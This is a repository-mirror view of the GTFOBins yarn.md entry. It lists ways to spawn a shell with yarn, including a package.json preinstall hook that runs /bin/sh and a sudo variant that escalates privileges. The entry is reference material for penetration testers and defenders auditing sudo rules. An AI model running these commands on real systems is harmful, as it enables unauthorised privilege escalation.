1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/yarn.md

12 lines
243 B
Markdown
Raw Normal View History

2021-06-18 14:06:46 +02:00
---
functions:
shell:
- code: yarn exec /bin/sh
2021-06-18 14:16:48 +02:00
- code: |
TF=$(mktemp -d)
echo '{"scripts": {"preinstall": "/bin/sh"}}' > $TF/package.json
yarn --cwd $TF install
2021-06-18 14:06:46 +02:00
sudo:
- code: sudo yarn exec /bin/sh
---